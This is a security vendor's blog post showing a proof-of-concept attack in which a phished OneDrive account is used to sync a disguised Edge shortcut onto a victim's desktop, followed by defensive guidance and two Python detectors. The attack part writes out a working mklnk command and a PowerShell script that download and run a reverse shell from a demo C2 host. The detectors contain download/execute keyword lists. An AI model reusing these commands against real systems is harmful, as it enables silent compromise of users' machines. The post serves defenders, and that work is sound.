
This is how threat actors use OneDrive compromise to infect local Windows hosts

7 min read
February 10, 2025
By: Yasin Tas

The trusted status of Microsoft cloud applications has inevitably resulted in their widespread use in cyber threat campaigns. Over the past few years, the Eye Security research team has tracked multiple threats using Microsoft applications across the attack lifecycle, from initial access by phishing for credentials to data exfiltration.

Recent advances like machine learning and computer vision technologies have increased the effectiveness of email security. Therefore, threat actors are exploiting new vectors to phish users for their Microsoft credentials.  

These credentials are often used to launch business email compromise (BEC) attacks. But they can also be used to access cloud storage, like OneDrive. This provides many opportunities for a threat actor, including: 

  1. Direct access to valuable information  
  2. A trusted repository to host malware for distribution 
  3. A trusted command and control (C2) channel  
  4. Data exfiltration via a trusted channel 
  5. Synchronisation misuse  

It is this final tactic, sync misuse, that our threat researchers decided to investigate further, and we discovered an interesting new potential attack that we have not seen reported in the wild. By combining sync misuse with another known tactic, replacing .lnk files, a threat actor can rapidly move from a compromised account to a compromised Windows host, from where they can move laterally to achieve their goals.

Below we describe this proof-of-concept attack and how you can protect against it.  

Recently, we detected a particularly insidious attack using Microsoft Teams to distribute malware. Learn more about this attack and how to protect against it here:  "Microsoft Teams Chat: the rising phishing threat and how to stop it".  

What is OneDrive sync and how does it work?

By default, when you enrol a device in Intune and have no OneDrive/SharePoint policies set up, OneDrive automatically synchronises a user's desktop to a OneDrive folder. This also happens when a user signs into OneDrive with their work or school account.

In figure 1 below, the white circle with a green checkmark next to each application and file icon means that item is synchronised between the user's desktop and the OneDrive cloud. It is also worth noting that a change made through the OneDrive web interface takes priority over the locally synced copy: if a user works on several devices and uploads a file with the same name through the web version of OneDrive, that file is pushed down and replaces the copy on every other device. At upload time the user can choose whether to replace the existing file or keep it under a different name. Microsoft documents the meaning of each sync icon on its support site.

Figure 1. Desktop shortcuts showing the OneDrive sync status icon (white circle with green checkmark)

Proof-of-concept stages 

For our proof of concept, we will assume that the target user has already been phished and the threat actor has access to their Microsoft 365 account. The goal is to compromise the target user’s Windows host and encrypt their data by using OneDrive sync to replace a shortcut file on the user's desktop with a malicious one.  

Let’s explore how a threat actor might go about this. We’ll start with the target user’s OneDrive page to see what information we can find. 


From the default homepage, we can visit the “My Files” section on the left-hand side of the screen, where we see all the folders and files being synced on their OneDrive. We could exfiltrate and steal all the data on OneDrive, but our goal is to compromise the host and run malware or ransomware directly on it. Let's look into the “Desktop” folder. 


Our target user has a few shortcut files we can replace. We choose “Microsoft Edge.lnk” since it is likely they will open this browser when they start their workday. 


Creating the new shortcut file  

In order to create a shortcut file, we use a tool called "mklnk". We run the following command to create the malicious link:

    ┌──(venv)─(kaliVM-KALI)-[~/Documents/mklnk]
    └─$ python2 lnk.py "Microsoft Edge.lnk" "C:\Windows\System32\cmd.exe" -w "C:\Windows\Temp" -i "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -a "/k \"(C:\PROGRA~2\Microsoft\Edge\Application\msedge.exe & powershell -command \"Write-Output 'Microsoft Edge is updating...'; IEX (iwr -UseBasicParsing 'http://192.168.139.133:1337/rollout.ps1')\")\""

Here is a tear-down of the command, argument by argument:

  1. Microsoft Edge.lnk: the name of the shortcut file we are creating.
  2. C:\Windows\System32\cmd.exe: the program that is actually launched in the background.
  3. -w "C:\Windows\Temp": the working directory. We use Windows\Temp because it is normally readable and writable by a standard user.
  4. -i "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe": the icon the shortcut will display.
  5. -a "/k \"(C:\PROGRA~2\Microsoft\Edge\Application\msedge.exe & powershell -command \"Write-Output 'Microsoft Edge is updating...'; IEX (iwr -UseBasicParsing 'http://192.168.139.133:1337/rollout.ps1')\")\"": the malicious arguments given to the shortcut file, where 192.168.139.133 is our demo C2 server.

Note that we can change all of these arguments. If the user is using Chrome for example, all we have to do is change the path and name to the Chrome executable. 

When the file runs, the following will occur: 

  1. We call the original Edge executable so that the target user will not suspect anything. To them it will look like an Edge browser is opening.  
  2. We call PowerShell and display on the screen that Edge is updating. We do this to engage our target user so they suspect nothing is wrong.   
  3. We download and invoke a PowerShell script containing our reverse shell. This gives us control of the target's host.
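The tear-down above lists exactly what a disguised shortcut has to carry: a target that is a command interpreter rather than the application it imitates, a long argument string that downloads and runs code, and an icon borrowed from another program. Those same fields are what a defender can check. The following Python is an added example, not code from the original post or from the mklnk tool: it parses the ShellLinkHeader, LinkInfo and StringData sections of a .lnk file (per the MS-SHLLINK format) and scores the shortcut on those three signals. The build_lnk helper, the INTERPRETERS and DOWNLOAD_MARKERS lists and the two sample shortcuts are constructed for the demonstration; the C2 URL inside the sample is a placeholder.

```python
import struct

# Shell Link (MS-SHLLINK) constants: header CLSID and the LinkFlags bits we need.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH, HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = [1 << i for i in range(8)]
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                 (HAS_ARGS, "arguments"), (HAS_ICON, "icon"))  # StringData order per the spec

# Constructed watch-lists: interpreters a GUI-application shortcut should never launch, and
# argument fragments typical of download-and-execute one-liners.
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
DOWNLOAD_MARKERS = ("iex", "invoke-expression", "iwr", "invoke-webrequest", "downloadstring",
                    "http://", "https://", "-enc", "frombase64string")


def parse_lnk(data: bytes) -> dict:
    """Pull target path, working directory, arguments and icon out of a .lnk file."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos, info = 76, {}
    if flags & HAS_IDLIST:  # LinkTargetIDList: 2-byte size then the item list; skip it
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:  # LinkInfo: the LocalBasePath is the resolved target
        li_size, _hdr_size, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 0x1:  # VolumeIDAndLocalBasePath
            start = pos + base_off
            info["target"] = data[start:data.index(b"\x00", start)].decode("latin-1")
        pos += li_size
    for flag, key in STRING_FIELDS:  # StringData: 2-byte character count, then the characters
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            info[key] = raw.decode("utf-16-le" if width == 2 else "latin-1")
            pos += count * width
    return info


def _basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def assess_lnk(info: dict) -> list:
    """Return the reasons a shortcut looks like a disguised launcher; an empty list means clean."""
    reasons = []
    target = _basename(info.get("target") or info.get("relative_path") or "")
    args = info.get("arguments", "").lower()
    icon = _basename(info.get("icon", ""))
    if target in INTERPRETERS:
        reasons.append(f"target is a command interpreter ({target})")
    hits = [m for m in DOWNLOAD_MARKERS if m in args]
    if hits:
        reasons.append("arguments contain download/execute markers: " + ", ".join(hits))
    if icon.endswith(".exe") and target and icon != target:
        reasons.append(f"icon borrowed from {icon} but target is {target}")
    if len(args) > 200:
        reasons.append(f"unusually long argument string ({len(args)} chars)")
    return reasons


def build_lnk(target: str, args: str = "", workdir: str = "", icon: str = "") -> bytes:
    """Constructed fixture: a minimal Shell Link with LinkInfo and StringData (no IDList)."""
    flags = HAS_LINKINFO | IS_UNICODE
    volume_id = struct.pack("<IIII", 17, 3, 0x1234ABCD, 16) + b"\x00"  # fixed disk, empty label
    base = target.encode("ascii") + b"\x00"
    hdr = 0x1C
    vol_off, base_off = hdr, hdr + len(volume_id)
    suffix_off = base_off + len(base)
    link_info = struct.pack("<IIIIIII", suffix_off + 1, hdr, 0x1, vol_off, base_off, 0, suffix_off)
    link_info += volume_id + base + b"\x00"
    strings = b""
    for flag, value in ((HAS_WORKDIR, workdir), (HAS_ARGS, args), (HAS_ICON, icon)):
        if value:
            flags |= flag
            strings += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + b"\x00" * 52
    return header + link_info + strings


# Constructed samples: a genuine Edge shortcut and a disguised one shaped like the write-up's.
EDGE = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
BENIGN = build_lnk(EDGE, icon=EDGE)
DISGUISED = build_lnk(
    r"C:\Windows\System32\cmd.exe", workdir=r"C:\Windows\Temp", icon=EDGE,
    args='/k "(C:\\PROGRA~2\\Microsoft\\Edge\\Application\\msedge.exe & powershell -command '
         '"IEX (iwr -UseBasicParsing \'http://c2-placeholder.invalid/rollout.ps1\')")"')

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("disguised", DISGUISED)):
        print(label, "->", assess_lnk(parse_lnk(blob)) or "clean")
```

Run it over every .lnk in a synced Desktop folder (for example from an EDR live-response session) by feeding each file's bytes to parse_lnk. The icon/target mismatch is the check most specific to this technique: a shortcut that looks like Edge but launches cmd.exe has no legitimate reason to exist, whereas the interpreter and download-marker checks will also catch administrative shortcuts that need a human look.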

Preparing the attack  

Before replacing the Edge browser .lnk file we prepare the rest of our attack. First, we establish a basic HTTP server, upload the shell and initiate a Netcat listener that will wait for our target user to click the replaced Edge shortcut. We create a script that will grant us access to the target user’s host when they click on the shortcut. The script will download and execute our reverse shell, which we compiled with a project called Sn1r/Nim-Reverse-Shell.   

PowerShell file (rollout.ps1):

    $url = "http://192.168.139.133:1337/allspark.exe"
    $outpath = "$env:TEMP/allspark.exe"
    Invoke-WebRequest -Uri $url -OutFile $outpath
    Start-Process -FilePath $outpath

Now that everything is ready, we can set up the Netcat listener together with the simple HTTP server, ready to serve the script when the target user clicks the new Edge browser .lnk file.

Finally, we upload the malicious .lnk file and let OneDrive sync it to the user’s desktop. 


 When prompted, we tell OneDrive to replace it.  


Executing the attack 

Now we wait for the target user to click on the Edge shortcut. 


The user clicks and our script runs, giving us access to their Windows host. 


Although there are a few signs that something unusual has occurred, it is highly unlikely that our target user will know their host has been compromised. At the bottom of the screen, on the taskbar, you can see two Edge icons. One of them is our disguised cmd.exe, which, if the user clicked, would show them the command line window. Of course, this doesn’t give them a lot of information, as it simply says Edge is updating. 

 

If we open Task Manager, we can see our backdoor process. Since we used known malware, Microsoft Defender detected it as it had a signature for it. A sophisticated threat actor could create a more advanced attack that would not be detected by standard AV.  


How to protect against this attack  

There are a number of measures you can take to better protect against this type of attack. Below are the most effective.   

Change the OneDrive policy to block shortcut files from syncing 

You can prevent shortcut files being synced from a user's desktop to OneDrive by changing the policy in the SharePoint admin center: go to Settings -> OneDrive Sync -> Block upload of specific file types and check the box. This stops users' sync clients uploading shortcut files to OneDrive. Keep in mind that this does not prevent shortcut files being uploaded through the web interface, so we also recommend restricting sync to domain-joined devices.

This policy only prevents sync from the host to OneDrive, not the other way around. A threat actor can still upload a shortcut file to a user's synchronised Desktop folder in OneDrive, and it will sync down to the host, appearing in the first empty spot on their desktop. This still represents a risk because, as in our proof of concept, the target user might not notice the duplicate icon and click the new, malicious one.

Figure 14. Changing the OneDrive policy

Unless Microsoft implements a way to also prevent shortcut files being uploaded through the web interface, there is nothing else that can be done to prevent this. 

Launch regular user awareness & phishing simulations 

It is crucial for organisations to create a culture of security awareness. Train users how to recognise unusual behaviour on their computers and ensure they know how to notify their security or IT department when strange things appear or there is unusual activity.  

In our scenario, the user has been phished. It is important to perform regular simulated phishing attacks to train users to recognise the signs of phishing.  

Deploy endpoint detection and response (EDR) 

As discussed, an attacker who has gone to the trouble of creating this attack would be unlikely to use a piece of commodity malware that is easy to detect. Therefore, it is important for organisations to have a well-configured EDR solution, such as the market-leading CrowdStrike Falcon or Defender for Endpoint (P2/Business). Even for a sophisticated attack, the threat actor's actions will result in behaviours that trigger alerts.

Investigate all alerts  

When an EDR generates an alert, it is important for an expert security operations (SecOps) analyst to investigate it. In our proof of concept, the EDR blocked malicious actions. However, follow-up is also necessary to investigate what happened, how it occurred, how to prevent it and how to remove any remnants of the action/infection. If no one investigated, the Microsoft 365 account compromise would not have been discovered. It is not unusual for threats to remain undiscovered for weeks, during which time a threat actor can continue to progress an attack. 

Make sure your SIEM system is well configured

A Security Information and Event Management (SIEM) system is a crucial component of any organisation's cybersecurity strategy. It centralises security data from multiple sources, including endpoints, servers, cloud and applications, to monitor IT infrastructure, detect anomalies in real-time and maintain detailed logs of all events. 

A good SIEM can help detect both known and unknown threats, providing fine-grained, real-time visibility into on-premises and cloud-based activities. It uses correlation rules and statistical algorithms to extract actionable information from events and log entries.  

There are various SIEMs that already ship with built-in rules, such as LogScale, Microsoft Sentinel and Splunk.
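The sync policy described earlier stops the host uploading shortcuts, but a shortcut placed in the Desktop folder through the web interface still syncs down, which leaves detection. The OneDrive workload of the Microsoft 365 Unified Audit Log records both the web-side write and the sync client's subsequent download, so the two can be correlated. The following Python is an added example, not a rule shipped by any of the products named above or by Eye Security: it flags shortcut files written into a synced Desktop folder by anything other than the sync client, and raises the severity when a sync download of the same file by the same user follows. The log records are constructed; the field names follow the SharePoint/OneDrive audit schema (Operation, UserId, ClientIP, UserAgent, SourceFileName, SourceFileExtension, SourceRelativeUrl), and identifying the sync client by a "SkyDriveSync" user agent is an assumption.

```python
from datetime import datetime, timedelta

# Constructed sample records modelled on Microsoft 365 Unified Audit Log entries for the
# OneDrive workload (field names follow the audit schema; every value is made up).
SAMPLE_AUDIT_LOG = [
    {"CreationTime": "2025-02-10T07:55:02", "Operation": "FileSyncUploadedFull",
     "UserId": "alice@contoso.example", "ClientIP": "10.0.5.21",
     "UserAgent": "Microsoft SkyDriveSync 24.201.1006.0005", "Workload": "OneDrive",
     "SourceFileName": "Microsoft Edge.lnk", "SourceFileExtension": "lnk", "SourceRelativeUrl": "Desktop"},
    {"CreationTime": "2025-02-10T08:02:11", "Operation": "FileUploaded",
     "UserId": "alice@contoso.example", "ClientIP": "203.0.113.77",
     "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/121.0", "Workload": "OneDrive",
     "SourceFileName": "Microsoft Edge.lnk", "SourceFileExtension": "lnk", "SourceRelativeUrl": "Desktop"},
    {"CreationTime": "2025-02-10T08:03:40", "Operation": "FileSyncDownloadedFull",
     "UserId": "alice@contoso.example", "ClientIP": "10.0.5.21",
     "UserAgent": "Microsoft SkyDriveSync 24.201.1006.0005", "Workload": "OneDrive",
     "SourceFileName": "Microsoft Edge.lnk", "SourceFileExtension": "lnk", "SourceRelativeUrl": "Desktop"},
    {"CreationTime": "2025-02-10T08:10:00", "Operation": "FileUploaded",
     "UserId": "bob@contoso.example", "ClientIP": "203.0.113.9",
     "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/122.0", "Workload": "OneDrive",
     "SourceFileName": "notes.txt", "SourceFileExtension": "txt", "SourceRelativeUrl": "Desktop"},
]

SHORTCUT_EXTS = {"lnk", "url"}                      # Windows shortcut and Internet shortcut
WEB_WRITE_OPS = {"FileUploaded", "FileModified", "FileRenamed", "FileMoved", "FileCopied"}
SYNC_DOWNLOAD_OPS = {"FileSyncDownloadedFull", "FileSyncDownloadedPartial"}


def _ts(rec: dict) -> datetime:
    return datetime.fromisoformat(rec["CreationTime"])


def is_sync_client(user_agent: str) -> bool:
    """Assumption: the OneDrive sync client identifies itself as 'Microsoft SkyDriveSync'."""
    ua = (user_agent or "").lower()
    return "skydrivesync" in ua or "onedrive" in ua


def detect_desktop_shortcut_drops(records: list, window: timedelta = timedelta(hours=24)) -> list:
    """Flag shortcut files written into a synced Desktop folder via the web/API path,
    and mark whether a sync client then pulled the file down to a host."""
    alerts = []
    for rec in records:
        if rec.get("Workload") != "OneDrive" or rec.get("Operation") not in WEB_WRITE_OPS:
            continue
        if rec.get("SourceFileExtension", "").lower() not in SHORTCUT_EXTS:
            continue
        if rec.get("SourceRelativeUrl", "").split("/")[0].lower() != "desktop":
            continue
        if is_sync_client(rec.get("UserAgent")):
            continue  # the user's own sync client mirroring their desktop is the normal case
        t0 = _ts(rec)
        delivered = [r for r in records
                     if r.get("UserId") == rec["UserId"] and r.get("Operation") in SYNC_DOWNLOAD_OPS
                     and r.get("SourceFileName") == rec["SourceFileName"]
                     and t0 <= _ts(r) <= t0 + window]
        alerts.append({
            "user": rec["UserId"], "file": rec["SourceFileName"], "operation": rec["Operation"],
            "upload_ip": rec.get("ClientIP"), "user_agent": rec.get("UserAgent"),
            "delivered_to_host": bool(delivered),
            "host_ips": sorted({r.get("ClientIP") for r in delivered}),
            "severity": "high" if delivered else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_desktop_shortcut_drops(SAMPLE_AUDIT_LOG):
        print(alert)
```

The same logic carries over to a SIEM search: filter the OneDrive workload for write operations on shortcut extensions under the Desktop path where the user agent is a browser, then join on UserId and SourceFileName against sync download events. A "high" hit tells the analyst which host IP received the file, which is where the EDR investigation described below should start.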

License a managed detection and response service (MDR) 

Deploying tools like a SIEM is essential to help reduce the likelihood of an attacker who has successfully compromised a Microsoft account from progressing their attack. However, you still require SecOps experts to make best use of these tools. Many organisations are finding that building a security operations centre (SOC), staffing it, and licensing the tools required is cost-prohibitive. So they turn to third-party managed security services or MDR providers.  

MDR services provide organisations of all sizes, across any industry, with a remote SOC staffed by highly skilled SecOps professionals on a 24/7 basis. Their main goal is to monitor specific products in their customers’ infrastructures and detect, respond to, and contain an in-progress cyber attack that has evaded their primary defences.   

Get in touch to find out more about Eye Security's MDR and how we differ from other providers by bundling significant value-add across your security programme.
